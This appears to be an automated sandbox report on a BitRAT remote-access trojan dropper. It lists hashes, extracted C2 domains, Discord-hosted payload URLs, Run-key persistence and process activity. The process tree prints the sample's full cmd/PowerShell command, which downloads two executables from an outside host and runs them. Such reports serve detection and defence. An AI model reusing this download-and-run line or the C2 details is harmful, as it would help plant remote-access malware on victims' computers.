bitrat | 2d3c256a17925e5102852d2a9ecd212d9118ae9003b9c6cc064a598ef95e4891

General

Target

SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
Size

46KB
MD5

0c3281387e69e28ac3865135420ec039
SHA1

068bd09ad5f8dae225da6b53754823ed6f194973
SHA256

2d3c256a17925e5102852d2a9ecd212d9118ae9003b9c6cc064a598ef95e4891
SHA512

d8d7a8b678b37b91206db130cbefd522a8b6d3e1617acb981a1ae4367dc48c311ac64b9e973b14bdb0ff9cc6b62481f55b541791244b664907c95a29d9f9ceb0

Score

10^/10

bitrat persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe

Extracted

Family

bitrat

Version

1.38

C2

linksphere.duckdns.org:1440

anubisgod.duckdns.org:1442

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
install_dir
Queeno
install_file
Queenol.exe
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

25 396 powershell.exe
31 492 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

hissbitrat.exemybitrat.exe

pid process

2696 hissbitrat.exe
3180 mybitrat.exe

flow	pid	process
25	396	powershell.exe
31	492	powershell.exe

pid	process
2696	hissbitrat.exe
3180	mybitrat.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

hissbitrat.exemybitrat.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe\uee00"	hissbitrat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe\uee00"	mybitrat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe\u0600"	hissbitrat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe䠀"	mybitrat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe䠀"	hissbitrat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe"	hissbitrat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe"	mybitrat.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

hissbitrat.exemybitrat.exe

pid process

2696 hissbitrat.exe
2696 hissbitrat.exe
2696 hissbitrat.exe
2696 hissbitrat.exe
3180 mybitrat.exe
3180 mybitrat.exe
3180 mybitrat.exe
3180 mybitrat.exe

pid	process
2696	hissbitrat.exe
2696	hissbitrat.exe
2696	hissbitrat.exe
2696	hissbitrat.exe
3180	mybitrat.exe
3180	mybitrat.exe
3180	mybitrat.exe
3180	mybitrat.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
396	powershell.exe
396	powershell.exe
396	powershell.exe
492	powershell.exe
492	powershell.exe
492	powershell.exe
1276	powershell.exe
1276	powershell.exe
1276	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exehissbitrat.exemybitrat.exe

description	pid	process
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	492	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeShutdownPrivilege	2696	hissbitrat.exe
Token: SeShutdownPrivilege	3180	mybitrat.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

hissbitrat.exemybitrat.exe

pid process

2696 hissbitrat.exe
2696 hissbitrat.exe
3180 mybitrat.exe
3180 mybitrat.exe

pid	process
2696	hissbitrat.exe
2696	hissbitrat.exe
3180	mybitrat.exe
3180	mybitrat.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

SecuriteInfo.com.Trojan.GenericKD.48131406.23753.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3792 wrote to memory of 800	3792	SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe	cmd.exe
PID 3792 wrote to memory of 800	3792	SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe	cmd.exe
PID 3792 wrote to memory of 800	3792	SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe	cmd.exe
PID 800 wrote to memory of 396	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 396	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 396	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 492	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 492	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 492	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 1276	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 1276	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 1276	800	cmd.exe	powershell.exe
PID 1276 wrote to memory of 2696	1276	powershell.exe	hissbitrat.exe
PID 1276 wrote to memory of 2696	1276	powershell.exe	hissbitrat.exe
PID 1276 wrote to memory of 2696	1276	powershell.exe	hissbitrat.exe
PID 800 wrote to memory of 3220	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 3220	800	cmd.exe	powershell.exe
PID 800 wrote to memory of 3220	800	cmd.exe	powershell.exe
PID 3220 wrote to memory of 3180	3220	powershell.exe	mybitrat.exe
PID 3220 wrote to memory of 3180	3220	powershell.exe	mybitrat.exe
PID 3220 wrote to memory of 3180	3220	powershell.exe	mybitrat.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3792

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1276

C:\Users\Admin\AppData\Roaming\hissbitrat.exe
"C:\Users\Admin\AppData\Roaming\hissbitrat.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3220

C:\Users\Admin\AppData\Roaming\mybitrat.exe
"C:\Users\Admin\AppData\Roaming\mybitrat.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3180

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
224eab1ee8f8bbf6b4683fb79b6055d1

SHA1
33cd2fdabbbc241411b813a9a27004ac36e750c1

SHA256
9adb51554502af88dcce67501fcf525760236a704332e44775d00cd132c23032

SHA512
8b2cfe4959f86f2f67e64d98c44ffd8bb8f9fc04a3a7cad4b8a07d313efb5269ee6986d13c7cfe08e9867bcd70f486c9e60880e78b0d15ab788d4b2075d049a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
65ea04345c47ccf5887eee225278ccab

SHA1
c440b599b9c78fedd7446370a898ed8d01ffe999

SHA256
bd2530d4e24690b3d4c695a0b24b58fd9506394f41961948ae516efe6a783124

SHA512
de68f0ae9b849627eafe94d62539164ff845d151bf7044a79ccdf1e3dffbeffccf1274025ac7ed478c581a636f41f5bf0e4468fe5896536cfbc5f37804a9b27a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3bccc65349b019bd0dbd59a763ee473c

SHA1
88ee7fced72f313aa9bb08117343830a2c7e785a

SHA256
d4d324dec36ca47807da3ab49ceafd2d636538cef08c221e7423d6667ae0862d

SHA512
6cb2babd01e476e8b5cab3edd53a88bb8ffe5e69cc3f047f882972b572a4ab8b5ae2a25185b6c8d72bbee8a9b064a7ed0bd7c3f07a29a1f94c1226c9a378912b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
29ba3c488b0ce79ff131d913df2393a6

SHA1
1ec519d550aaf031c42d7c5b337b1a08e40b033b

SHA256
3b14eac4e7910c89d7089f6d86af83a5a93ed8184b1326b9a2aa43177c470dcb

SHA512
977dcf90645e4bbf818dbfc6c0b5be64fda9d7467204d997137588ff1f6c42ea8ebd3b9613ecd09b58c79a6432baa3545626b7163cb577218cacdc527c5189ec

Download Submit
C:\Users\Admin\AppData\Roaming\hissbitrat.exe
MD5
09931bfc16fb78b4b9952931b70146a8

SHA1
4f2bc81788297b42d31d4468293cd5ae550df606

SHA256
3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d

SHA512
b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158

Download Submit
C:\Users\Admin\AppData\Roaming\hissbitrat.exe
MD5
09931bfc16fb78b4b9952931b70146a8

SHA1
4f2bc81788297b42d31d4468293cd5ae550df606

SHA256
3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d

SHA512
b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158

Download Submit
C:\Users\Admin\AppData\Roaming\mybitrat.exe
MD5
fa6bfb0013165303096d3eb53ca7ed7a

SHA1
6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d

SHA256
445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7

SHA512
2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a

Download Submit
C:\Users\Admin\AppData\Roaming\mybitrat.exe
MD5
fa6bfb0013165303096d3eb53ca7ed7a

SHA1
6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d

SHA256
445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7

SHA512
2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a

Download Submit
memory/396-143-0x0000000007043000-0x0000000007044000-memory.dmp

Filesize
4KB

Download
memory/396-125-0x0000000007660000-0x000000000767C000-memory.dmp

Filesize
112KB

Download
memory/396-127-0x00000000084D0000-0x0000000008546000-memory.dmp

Filesize
472KB

Download
memory/396-134-0x0000000009AF0000-0x000000000A168000-memory.dmp

Filesize
6.5MB

Download
memory/396-135-0x0000000009290000-0x00000000092AA000-memory.dmp

Filesize
104KB

Download
memory/396-140-0x00000000093B0000-0x0000000009444000-memory.dmp

Filesize
592KB

Download
memory/396-141-0x0000000009350000-0x0000000009372000-memory.dmp

Filesize
136KB

Download
memory/396-142-0x000000000A670000-0x000000000AB6E000-memory.dmp

Filesize
5.0MB

Download
memory/396-117-0x00000000031A0000-0x00000000031D6000-memory.dmp

Filesize
216KB

Download
memory/396-122-0x0000000007360000-0x00000000073C6000-memory.dmp

Filesize
408KB

Download
memory/396-124-0x0000000007DB0000-0x0000000008100000-memory.dmp

Filesize
3.3MB

Download
memory/396-118-0x0000000007680000-0x0000000007CA8000-memory.dmp

Filesize
6.2MB

Download
memory/396-119-0x0000000007040000-0x0000000007041000-memory.dmp

Filesize
4KB

Download
memory/396-126-0x0000000008190000-0x00000000081DB000-memory.dmp

Filesize
300KB

Download
memory/396-123-0x00000000073D0000-0x0000000007436000-memory.dmp

Filesize
408KB

Download
memory/396-120-0x0000000007042000-0x0000000007043000-memory.dmp

Filesize
4KB

Download
memory/396-121-0x00000000072C0000-0x00000000072E2000-memory.dmp

Filesize
136KB

Download
memory/492-161-0x0000000004B83000-0x0000000004B84000-memory.dmp

Filesize
4KB

Download
memory/492-149-0x0000000004B80000-0x0000000004B81000-memory.dmp

Filesize
4KB

Download
memory/492-150-0x0000000004B82000-0x0000000004B83000-memory.dmp

Filesize
4KB

Download
memory/1276-167-0x00000000069B2000-0x00000000069B3000-memory.dmp

Filesize
4KB

Download
memory/1276-180-0x00000000069B3000-0x00000000069B4000-memory.dmp

Filesize
4KB

Download
memory/1276-166-0x00000000069B0000-0x00000000069B1000-memory.dmp

Filesize
4KB

Download
memory/3220-185-0x0000000004D40000-0x0000000004D41000-memory.dmp

Filesize
4KB

Download
memory/3220-186-0x0000000004D42000-0x0000000004D43000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads